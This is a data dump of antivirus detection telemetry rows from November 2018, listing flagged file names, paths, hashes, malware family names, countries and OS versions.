  Row(detection=Row(filename='avscan-20181102-055541-e69f9faa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055541-E69F9FAA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062518-09d81f3f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062518-09D81F3F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055043-350fa3d1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055043-350FA3D1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053842-87246dfd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053842-87246DFD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054725-beef9df4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054725-BEEF9DF4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052123-1c04197d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052123-1C04197D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061802-05aad4de', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061802-05AAD4DE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052931-3e97c72e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052931-3E97C72E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051359-135c38e4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051359-135C38E4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052416-8356a18e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052416-8356A18E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053627-36bd90b5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053627-36BD90B5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055827-49db4df9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055827-49DB4DF9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062119-7b416cff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062119-7B416CFF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055757-379e8770', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055757-379E8770', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered tisir', filepath='C:\\WINDOWS\\System32\\Tasks\\Yahoo! Powered tisir', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='8526df54488745e1e85c05d2a04cd546df21d06ba727eeae68b84f25a5b2cf6b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T23:00:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054325-2fd6f728', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054325-2FD6F728', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cleanup.exe', filepath='C:\\Documents and Settings\\Shourya\\My Documents\\07082017\\Cleanup.exe', filesize=512000, name='W32/Sality.AT.#M0.#R0'), hash='7894c2506b7bc3b11607ef6792f039603494c6ee4ff7495a9899dbd5f8b3e01f', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='3', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T10:35:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055839-50c1c15b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055839-50C1C15B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054111-e01e14c2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054111-E01E14C2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050530-e41dd108', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050530-E41DD108', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062345-d2a01476', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062345-D2A01476', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered tisir', filepath='C:\\WINDOWS\\System32\\Tasks\\Yahoo! Powered tisir', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='8526df54488745e1e85c05d2a04cd546df21d06ba727eeae68b84f25a5b2cf6b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T03:00:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055812-40ac9fd3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055812-40AC9FD3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T21:51:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054433-5890d071', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054433-5890D071', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062412-e24e2425', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062412-E24E2425', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055440-c25586aa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055440-C25586AA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051300-f0635a9b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051300-F0635A9B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051913-ce8573f5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051913-CE8573F5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054312-2862c613', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054312-2862C613', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052529-ae98eddc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052529-AE98EDDC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053703-4c3f71d5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053703-4C3F71D5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060914-cb26a2ef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060914-CB26A2EF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054137-ef552882', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054137-EF552882', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T00:34:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='spinning.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\PENGANGKATAN SPINNING\\SPINNING.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155608-c31c3856', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155608-C31C3856', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:56:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\admin\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M2.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:29:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-161727-f8c8971b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2cd1ddcd\\AVSCAN-20181101-161148-D5525E98\\AVSCAN-20181101-161727-F8C8971B', filesize=1664000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='1db031dd1b44e54b3a07b549a9b0fae74898207fff1890788a72a5a60857729b', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:17:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwhad8d.exe', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWHAD8D.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:31:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095732-43335b8d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0993e29c\\AVSCAN-20181101-095559-362A6D63\\AVSCAN-20181101-095732-43335B8D', filesize=512000, name='TR/Rogue.512000.37.#M1.#R1'), hash='403b2f438e3d90db363f4381a9a0494d177e12f62554d24240507d83429139e8', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T01:57:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155358-ad4e150f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155358-AD4E150F', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:53:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwtrig20.exe', filepath='C:\\Users\\X\\Downloads\\OFFICE 2010\\OFFICE 2010 32bits\\Office.pt-br\\dwtrig20.exe', filesize=644000, name='W32/Neshta.A.#M1.#R1'), hash='4e0b759f551583c60d2cb6f31e598096af51080dd1f899bf7be069802cd191d0', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\PROGRA~2\\\\\\\\Avira\\\\\\\\Launcher\\\\\\\\AVIRAS~2.EXE\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\svchost.com', parentsize=41472, timestamp='2018-11-01T16:48:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-210540-1d5ce09b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_579e1550\\AVSCAN-20181031-210339-10A15C0C\\AVSCAN-20181031-210540-1D5CE09B', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T00:05:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gautorun.inf.exe', filepath='E:\\gautorun.inf.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='154543da78c93203979165fd0864dded8ff89a88f0a9be97acf3f690c8ca442b', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1965136, timestamp='2018-11-01T11:47:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=1332000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='1f6ed76428fe99315fa7880d2d5eb490678a7be1d9cb4a58544a6a77485e959e', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T08:58:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='1d563aca47ba0cb20387b3d8ccb65eda25a431b4b466711f0ee07f42f6785a79', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T06:13:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155407-aec10531', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155407-AEC10531', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:54:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:51:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='lapor 2016.scr', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2016\\LPA\\WAJIB LAPOR 2016\\LAPOR 2016.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:27:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='photoshop_lessons.exe', filepath='H:\\ORG\\برامج\\photoshop_lessons.exe', filesize=1024000, name='W32/Virut.Gen.#M1.#R1'), hash='2143d4d48849cbb2a73eebc6bfb51c426486b6313b41d5525c5d92f01944b69f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:58:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-122308-a85f6e7a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_dd46ccc4\\AVSCAN-20181101-122229-A0D6649D\\AVSCAN-20181101-122308-A85F6E7A', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:23:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$rvjzg9v', filepath='C:\\$Recycle.Bin\\S-1-5-21-1024011789-1237596223-2747892489-21661\\$RVJZG9V', filesize=64000, name='TR/Dldr.Script.sarmk.#M1.#R1'), hash='072bfde5fcec1822ca866eee949940153e6fba29fcd5a4ee02ddb4ff8632d8fc', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8694408, timestamp='2018-11-01T15:53:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-07-08-23.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-22T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T20:18:55Z'), dt=datetime.date(2018, 11, 1)),
